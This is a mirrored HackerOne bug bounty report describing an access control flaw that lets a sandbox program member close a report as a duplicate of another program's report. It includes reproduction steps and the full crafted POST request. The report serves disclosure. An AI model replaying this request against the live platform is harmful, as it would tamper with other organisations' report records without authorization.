Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneAkashhamal0x01H1:2516250
HistoryMay 22, 2024 - 7:54 p.m.

HackerOne: Access Control Vulnerability Enabling Unauthorized Access to Limited Disclosure Reports

2024-05-2219:54:27
akashhamal0x01
hackerone.com
16
access control vulnerability
unauthorized access
limited disclosure

AI Score

7.2

Confidence

Low

JSON

Summary:

Hi there, I hope you are doing well :)

I found a vulnerability which allows me to close a report as duplicate of another program report. This can cause problems in various ways, i will include some of them and rest needs to be verified on Hackerone side what additional impact it can cause and its root cause analysis.

Steps To Reproduce

  1. Create a Sandbox program
  2. Invite a user with Report and Engagement access
  3. Accept invitation from User B and login
  4. Check any report and select option to Close Report as duplicate and this will be the HTTP request:

POST /reports/bulk HTTP/2
Host: hackerone.com
Cookie: <USER B Cookies>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://hackerone.com/reports/2424755
X-Csrf-Token: <USER B CSRF TOKEN>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
X-Datadog-Origin: rum
X-Datadog-Parent-Id: 2173163794632761452
X-Datadog-Sampling-Priority: 1
X-Datadog-Trace-Id: 3844362884923386826
Content-Length: 289
Origin: https://hackerone.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

message=s&substate=duplicate&original_report_id=███████&reference=&add_reporter_to_original=false&reply_action=close-report&mark_ineligible_for_bounty=false&unassign_report_on_close=false&code_review_patch=&code_review_diff_url=&reports_count=1&report_ids%5B%5D=<your report ID>&bounty_currency=USD

Here, Only replace the values which are enclosed inside <> and then forward the request. Notice that the response is 200 OK and the report is closed as duplicate of █████ which is publicly disclosed report of Hackerone program

Impact

There were many scenarios in my mind regarding impact but these are most relevant ones:

It can impact Automation Pipelines because there can be many reports and the program can mistakenly enter other report ID .

This one is just assumption but i believe its possible:

When you close a report as duplicate of other report (Original report), it will show on right side panel the reports which are duplicate of that particular report like this:

{F3291232}

So my assumption is that , it might show like this to the program team in a genuine publicly disclosed report as the attacker can dupe his/her report to public report and the public report will be shown like that to the program manager or the viewers (participants or collaborators) which alternatively means it gives ability for any attacker to make other public reports look like they have duplicates but the duplicates are other reports from other program

Remaining impact, root cause and potential impacts are to be evaluated by h1 team as i am limited by my sandbox program and its privilege.

AI Score

7.2

Confidence

Low

JSON